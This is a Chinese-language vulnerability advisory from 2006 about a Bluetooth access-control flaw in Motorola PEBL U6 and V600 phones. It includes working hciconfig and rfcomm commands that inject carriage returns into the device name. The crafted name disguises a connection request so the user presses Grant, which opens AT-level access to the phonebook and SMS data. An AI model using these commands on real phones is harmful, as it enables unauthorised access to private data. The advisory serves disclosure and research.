Motorola蓝牙接口访问验证漏洞
发布日期:2006-03-22
更新日期:2006-03-22
受影响系统:Motorola PEBL U6
Motorola V600
描述:
BUGTRAQ ID:
17190
Motorola PEBL U6和Motorola V600都是非常流行的蓝牙手机。
PEBL和V600手机对蓝牙接口的访问控制上存在问题,攻击者可能利用此漏洞非授权获取对手机的访问。
PEBL和V600手机都提供了两个语音网关,其中一个要求配对,而另一个不要求。3信道上的“Headset Audio Gateway”不要求配对,因此如果用户受骗按下了“允许”的话攻击者就可以获得对手机的额外访问。
在正常环境下3信道上的通讯会弹出以下消息:
Remote Bluetooth Device Name
Requests Voice Gateway?
(Grant or Deny)
尽管会对用户提示连接,但用户界面对“0x0d”字符的反应比较特殊,允许攻击者诱骗用户接受连接请求:
# hciconfig hci0 name `echo -e "A\x0dB\x0dC\x0dD\x0dE\x0dF\x0dG"`
# rfcomm connect 0 00:15:A8:74:87:3E 3
上面的命令会在屏幕上显示以下消息:
A
B
C
D
E
F ...
(Grant or Deny)
一旦用于允许了连接,攻击者就会连接到音频网关,获得对手机的AT级访问,访问电话簿和SMS数据等个人信息。
<*来源:Kevin Finisterre (
dotslash@snosoft.com)
链接:IE crash
http://secunia.com/advisories/19319/print/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# hciconfig hci0 name `perl -e 'print
"Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
建议:
厂商补丁:
Motorola
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.motorola.com/浏览次数:3182
严重程度:0(网友投票)
